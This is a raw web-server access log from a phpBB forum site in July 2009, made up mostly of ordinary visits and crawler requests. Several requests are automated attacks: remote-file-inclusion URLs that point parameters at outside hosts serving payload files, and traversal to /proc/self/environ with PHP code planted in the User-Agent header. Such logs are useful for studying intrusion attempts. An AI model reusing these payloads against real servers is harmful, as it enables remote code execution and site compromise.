65.60.32.34 - - [04/Jul/2009:17:28:34 -0700] "POST /phpBB2/posting.php?sid=e75b527657eedaeb3177aa2e87baf289 HTTP/1.1" 200 13210 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
122.174.79.115 - - [04/Jul/2009:17:31:21 -0700] "GET /yahoo/SendMail.php HTTP/1.1" 200 4921 "http://in.1.p.in.webhosting.yahoo.com/phpmailsetup" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5" "www.webmaster-showcase.net"
122.174.79.115 - - [04/Jul/2009:17:31:22 -0700] "GET /yahoo/images/c.gif HTTP/1.1" 404 579 "http://www.webmaster-showcase.net/yahoo/SendMail.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5" "www.webmaster-showcase.net"
122.174.79.115 - - [04/Jul/2009:17:31:23 -0700] "GET /favicon.ico HTTP/1.1" 404 572 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5" "www.webmaster-showcase.net"
208.109.21.238 - - [04/Jul/2009:17:31:24 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
122.174.79.115 - - [04/Jul/2009:17:31:26 -0700] "GET /favicon.ico HTTP/1.1" 404 572 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5" "www.webmaster-showcase.net"
24.12.23.219 - - [04/Jul/2009:17:31:43 -0700] "GET /phpBB2/index.php HTTP/1.0" 200 17532 "http://www.webmaster-showcase.net/phpBB2/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.webmaster-showcase.net"
65.55.210.62 - - [04/Jul/2009:17:31:54 -0700] "GET /robots.txt HTTP/1.1" 404 571 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.webmaster-showcase.net"
65.55.210.62 - - [04/Jul/2009:17:32:13 -0700] "GET /phpBB2/viewtopic.php?p=173099 HTTP/1.1" 200 71767 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.webmaster-showcase.net"
65.55.107.232 - - [04/Jul/2009:17:34:50 -0700] "GET /phpBB2/viewtopic.php?p=173099 HTTP/1.0" 200 71732 "http://search.live.com/results.aspx?q=forum" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.webmaster-showcase.net"
65.55.107.232 - - [04/Jul/2009:17:35:00 -0700] "GET /phpBB2/templates/subSilver/formIE.css HTTP/1.0" 200 354 "http://www.webmaster-showcase.net/phpBB2/viewtopic.php?p=173099" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.webmaster-showcase.net"
69.20.70.31 - - [04/Jul/2009:17:36:40 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
187.159.23.199 - - [04/Jul/2009:17:36:57 -0700] "GET /favicon.ico HTTP/1.1" 404 568 "-" "Mozilla/4.0 (compatible; GoogleToolbar 4.0.1601.4978-big; Windows XP 5.1; MSIE 6.0.2900.2180)" "webmaster-showcase.net"
187.159.23.199 - - [04/Jul/2009:17:36:59 -0700] "GET /favicon.gif HTTP/1.1" 404 568 "-" "Mozilla/4.0 (compatible; GoogleToolbar 4.0.1601.4978-big; Windows XP 5.1; MSIE 6.0.2900.2180)" "webmaster-showcase.net"
72.36.131.98 - - [04/Jul/2009:17:37:05 -0700] "GET /phpBB2/posting.php?mode=quote&p=95114 HTTP/1.1" 200 56516 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "webmaster-showcase.net"
193.40.59.83 - - [04/Jul/2009:17:37:17 -0700] "POST /phpBB2/posting.php?sid=1b235cfaba2a74ac2489f93d3b4e4f27 HTTP/1.0" 200 15322 "http://webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=95114" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:17:37:17 -0700] "GET /config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 582 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:17:37:17 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 588 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:17:37:17 -0700] "GET /logs/showfile.php/access.log%20%20//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:17:37:17 -0700] "GET /logs/showfile.php//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
193.40.59.83 - - [04/Jul/2009:17:37:26 -0700] "POST /phpBB2/posting.php?sid=1b235cfaba2a74ac2489f93d3b4e4f27 HTTP/1.0" 200 12307 "http://webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=95114" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:17:37:29 -0700] "GET /config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 582 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:17:37:29 -0700] "GET /logs/showfile.php//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:17:37:29 -0700] "GET /logs/showfile.php/access.log%20%20//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:17:37:29 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 588 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
193.40.59.83 - - [04/Jul/2009:17:37:38 -0700] "POST /phpBB2/posting.php?sid=1b235cfaba2a74ac2489f93d3b4e4f27 HTTP/1.0" 200 14724 "http://webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=95114" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "webmaster-showcase.net"
193.40.59.83 - - [04/Jul/2009:17:37:45 -0700] "POST /phpBB2/posting.php?sid=1b235cfaba2a74ac2489f93d3b4e4f27 HTTP/1.0" 200 12307 "http://webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=95114" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "webmaster-showcase.net"
193.40.59.83 - - [04/Jul/2009:17:37:50 -0700] "POST /phpBB2/posting.php?sid=1b235cfaba2a74ac2489f93d3b4e4f27 HTTP/1.0" 200 12307 "http://webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=95114" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "webmaster-showcase.net"
193.40.59.83 - - [04/Jul/2009:17:37:59 -0700] "POST /phpBB2/posting.php?sid=1b235cfaba2a74ac2489f93d3b4e4f27 HTTP/1.0" 200 14818 "http://webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=95114" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "webmaster-showcase.net"
193.40.59.83 - - [04/Jul/2009:17:38:04 -0700] "POST /phpBB2/posting.php?sid=1b235cfaba2a74ac2489f93d3b4e4f27 HTTP/1.0" 200 12307 "http://webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=95114" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "webmaster-showcase.net"
116.121.201.73 - - [04/Jul/2009:17:38:05 -0700] "GET /errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 580 "-" "Mozilla/5.0" "webmaster-showcase.net"
116.121.201.73 - - [04/Jul/2009:17:38:05 -0700] "GET /yahoo/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 586 "-" "Mozilla/5.0" "webmaster-showcase.net"
193.40.59.83 - - [04/Jul/2009:17:38:11 -0700] "POST /phpBB2/posting.php?sid=1b235cfaba2a74ac2489f93d3b4e4f27 HTTP/1.0" 200 12307 "http://webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=95114" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "webmaster-showcase.net"
193.40.59.83 - - [04/Jul/2009:17:38:18 -0700] "POST /phpBB2/posting.php?sid=1b235cfaba2a74ac2489f93d3b4e4f27 HTTP/1.0" 200 14858 "http://webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=95114" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "webmaster-showcase.net"
193.40.59.83 - - [04/Jul/2009:17:38:26 -0700] "POST /phpBB2/posting.php?sid=1b235cfaba2a74ac2489f93d3b4e4f27 HTTP/1.0" 200 12307 "http://webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=95114" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "webmaster-showcase.net"
116.121.201.73 - - [04/Jul/2009:17:38:35 -0700] "GET /errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 580 "-" "Mozilla/5.0" "webmaster-showcase.net"
116.121.201.73 - - [04/Jul/2009:17:38:35 -0700] "GET /yahoo/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 586 "-" "Mozilla/5.0" "webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:17:38:36 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 584 "-" "Mozilla/5.0" "webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:17:38:36 -0700] "GET /config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 578 "-" "Mozilla/5.0" "webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:17:38:36 -0700] "GET /logs/showfile.php//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:17:38:36 -0700] "GET /logs/showfile.php/access_090530.log%20%20//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:17:38:43 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 584 "-" "Mozilla/5.0" "webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:17:38:43 -0700] "GET /config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 578 "-" "Mozilla/5.0" "webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:17:38:43 -0700] "GET /logs/showfile.php//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:17:38:43 -0700] "GET /logs/showfile.php/access_090530.log%20%20//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
65.17.253.220 - - [04/Jul/2009:17:38:50 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
65.55.210.62 - - [04/Jul/2009:17:39:30 -0700] "GET /robots.txt HTTP/1.1" 404 567 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "webmaster-showcase.net"
211.230.156.161 - - [04/Jul/2009:17:39:31 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 596 "-" "Mozilla/5.0" "webmaster-showcase.net"
211.230.156.161 - - [04/Jul/2009:17:39:31 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 590 "-" "Mozilla/5.0" "webmaster-showcase.net"
211.230.156.161 - - [04/Jul/2009:17:39:31 -0700] "GET /logs/showfile.php//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
211.230.156.161 - - [04/Jul/2009:17:39:31 -0700] "GET /logs/showfile.php/access_090603.log//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
211.230.156.161 - - [04/Jul/2009:17:39:53 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 600 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
211.230.156.161 - - [04/Jul/2009:17:39:53 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 594 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
211.230.156.161 - - [04/Jul/2009:17:39:53 -0700] "GET /logs/showfile.php/access_090523.log//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
211.230.156.161 - - [04/Jul/2009:17:39:53 -0700] "GET /logs/showfile.php//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
65.55.210.62 - - [04/Jul/2009:17:39:54 -0700] "GET /phpBB2/posting.php?mode=quote&p=95120 HTTP/1.1" 200 93563 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "webmaster-showcase.net"
209.235.254.107 - - [04/Jul/2009:17:40:03 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
96.31.68.140 - - [04/Jul/2009:17:40:13 -0700] "POST /phpBB2/posting.php?sid=92e01a5a856f18055d46020aa03c8238 HTTP/1.1" 200 13135 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
64.90.164.110 - - [04/Jul/2009:17:40:14 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:17:40:18 -0700] "GET /logs/showfile.php/access.log//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:17:40:28 -0700] "GET /logs/showfile.php/access.log//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
124.0.55.226 - - [04/Jul/2009:17:41:07 -0700] "GET /logs/showfile.php/access_090616.log/main.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 1595 "-" "XXX<? echo "w0000t\"; ?>XXX" "webmaster-showcase.net"
212.95.226.66 - - [04/Jul/2009:17:41:09 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
124.0.55.226 - - [04/Jul/2009:17:41:13 -0700] "GET /logs/showfile.php/access_090616.log/main.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1595 "-" "XXX<? echo \"w0000t\"; ?>XXX" "webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:17:41:15 -0700] "GET /logs/showfile.php/access_090523.log//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
124.0.55.226 - - [04/Jul/2009:17:41:19 -0700] "GET /logs/showfile.php/main.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 1595 "-" "XXX<? echo \"w0000t\"; ?>XXX" "webmaster-showcase.net"
124.0.55.226 - - [04/Jul/2009:17:41:20 -0700] "GET /main.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 5445 "-" "XXX<? echo \"w0000t\"; ?>XXX" "webmaster-showcase.net"
124.0.55.226 - - [04/Jul/2009:17:41:20 -0700] "GET /logs/showfile.php/access_090615.log/main.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 1595 "-" "XXX<? echo \"w0000t\"; ?>XXX" "www.webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:17:41:23 -0700] "GET /logs/showfile.php/access_090523.log//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
124.0.55.226 - - [04/Jul/2009:17:41:25 -0700] "GET /logs/showfile.php/main.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1595 "-" "XXX<? echo \"w0000t\"; ?>XXX" "webmaster-showcase.net"
124.0.55.226 - - [04/Jul/2009:17:41:25 -0700] "GET /main.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5343 "-" "XXX<? echo \"w0000t\"; ?>XXX" "webmaster-showcase.net"
124.0.55.226 - - [04/Jul/2009:17:41:25 -0700] "GET /logs/showfile.php/access_090615.log/main.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1595 "-" "XXX<? echo \"w0000t\"; ?>XXX" "www.webmaster-showcase.net"
66.232.97.145 - - [04/Jul/2009:17:41:26 -0700] "POST /phpBB2/posting.php?sid=94cb7a33e52bef2fb463a7f8d26245fb HTTP/1.1" 200 13239 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
62.149.226.208 - - [04/Jul/2009:17:41:56 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
124.0.55.226 - - [04/Jul/2009:17:42:00 -0700] "GET /main.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 5366 "-" "XXX<? echo \"w0000t\"; ?>XXX" "www.webmaster-showcase.net"
124.0.55.226 - - [04/Jul/2009:17:42:01 -0700] "GET /logs/showfile.php/main.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 1595 "-" "XXX<? echo \"w0000t\"; ?>XXX" "www.webmaster-showcase.net"
65.55.109.156 - - [04/Jul/2009:17:42:03 -0700] "GET /phpBB2/posting.php?mode=quote&p=95120 HTTP/1.0" 200 93528 "http://search.live.com/results.aspx?q=viagra" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "webmaster-showcase.net"
124.0.55.226 - - [04/Jul/2009:17:42:06 -0700] "GET /main.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5278 "-" "XXX<? echo \"w0000t\"; ?>XXX" "www.webmaster-showcase.net"
124.0.55.226 - - [04/Jul/2009:17:42:06 -0700] "GET /logs/showfile.php/main.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1595 "-" "XXX<? echo \"w0000t\"; ?>XXX" "www.webmaster-showcase.net"
65.55.109.156 - - [04/Jul/2009:17:42:06 -0700] "GET /phpBB2/templates/subSilver/formIE.css HTTP/1.0" 200 354 "http://webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=95120" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "webmaster-showcase.net"
65.55.109.156 - - [04/Jul/2009:17:42:12 -0700] "GET /phpBB2/posting.php?mode=topicreview&t=20617&sid=2a28295c1be9656951b5df5661a45777 HTTP/1.0" 200 67621 "http://webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=95120" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "webmaster-showcase.net"
65.60.32.34 - - [04/Jul/2009:17:42:23 -0700] "POST /phpBB2/posting.php?sid=e75b527657eedaeb3177aa2e87baf289 HTTP/1.1" 200 13225 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
211.230.156.161 - - [04/Jul/2009:17:43:05 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 596 "-" "Mozilla/5.0" "webmaster-showcase.net"
211.230.156.161 - - [04/Jul/2009:17:43:05 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 590 "-" "Mozilla/5.0" "webmaster-showcase.net"
211.230.156.161 - - [04/Jul/2009:17:43:05 -0700] "GET /logs/showfile.php/access_090603.log//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
211.230.156.161 - - [04/Jul/2009:17:43:05 -0700] "GET /logs/showfile.php//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
211.230.156.161 - - [04/Jul/2009:17:43:28 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 594 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
211.230.156.161 - - [04/Jul/2009:17:43:28 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 600 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
211.230.156.161 - - [04/Jul/2009:17:43:28 -0700] "GET /logs/showfile.php//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
211.230.156.161 - - [04/Jul/2009:17:43:28 -0700] "GET /logs/showfile.php/access_090523.log//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
211.230.156.161 - - [04/Jul/2009:17:43:35 -0700] "GET /logs/showfile.php/access.log//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
61.106.21.35 - - [04/Jul/2009:17:43:44 -0700] "GET /logs/showfile.php/index.php?meio.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 3345 "-" "XXX<? echo \"w0000t\"; ?>XXX" "www.webmaster-showcase.net"
61.106.21.35 - - [04/Jul/2009:17:43:44 -0700] "GET /index.php?meio.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 583 "-" "XXX<? echo \"w0000t\"; ?>XXX" "www.webmaster-showcase.net"
61.106.21.35 - - [04/Jul/2009:17:43:44 -0700] "GET /logs/showfile.php/index.php?meio.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3345 "-" "XXX<? echo \"w0000t\"; ?>XXX" "www.webmaster-showcase.net"
61.106.21.35 - - [04/Jul/2009:17:43:44 -0700] "GET /logs/showfile.php/access_090615.log/index.php?meio.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 1595 "-" "XXX<? echo \"w0000t\"; ?>XXX" "www.webmaster-showcase.net"
61.106.21.35 - - [04/Jul/2009:17:43:45 -0700] "GET /index.php?meio.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 583 "-" "XXX<? echo \"w0000t\"; ?>XXX" "www.webmaster-showcase.net"
61.106.21.35 - - [04/Jul/2009:17:43:45 -0700] "GET /logs/showfile.php/access_090615.log/index.php?meio.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1595 "-" "XXX<? echo \"w0000t\"; ?>XXX" "www.webmaster-showcase.net"
65.55.210.62 - - [04/Jul/2009:17:44:19 -0700] "GET /phpBB2/posting.php?mode=quote&p=162268 HTTP/1.1" 200 47522 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.webmaster-showcase.net"
65.55.210.62 - - [04/Jul/2009:17:44:21 -0700] "GET /phpBB2/viewtopic.php?p=130095 HTTP/1.1" 200 236792 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.webmaster-showcase.net"
65.55.109.11 - - [04/Jul/2009:17:44:43 -0700] "GET /phpBB2/posting.php?mode=quote&p=162268 HTTP/1.0" 200 47506 "http://search.live.com/results.aspx?q=drugs" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.webmaster-showcase.net"
65.55.109.11 - - [04/Jul/2009:17:44:50 -0700] "GET /phpBB2/templates/subSilver/formIE.css HTTP/1.0" 200 354 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=162268" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.webmaster-showcase.net"
65.55.109.11 - - [04/Jul/2009:17:45:01 -0700] "GET /phpBB2/posting.php?mode=topicreview&t=420&sid=eccfe8eed0cfc865854f84be45b92b65 HTTP/1.0" 200 21710 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=162268" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.webmaster-showcase.net"
211.230.156.161 - - [04/Jul/2009:17:45:09 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 594 "-" "Mozilla/5.0" "webmaster-showcase.net"
211.230.156.161 - - [04/Jul/2009:17:45:09 -0700] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 588 "-" "Mozilla/5.0" "webmaster-showcase.net"
211.230.156.161 - - [04/Jul/2009:17:45:09 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 594 "-" "Mozilla/5.0" "webmaster-showcase.net"
211.230.156.161 - - [04/Jul/2009:17:45:09 -0700] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 588 "-" "Mozilla/5.0" "webmaster-showcase.net"
211.230.156.161 - - [04/Jul/2009:17:45:09 -0700] "GET /logs/showfile.php//faqsupport/samplefaqsupport.php?path[docroot]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
211.230.156.161 - - [04/Jul/2009:17:45:09 -0700] "GET /logs/showfile.php/access_090510.log//faqsupport/samplefaqsupport.php?path[docroot]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
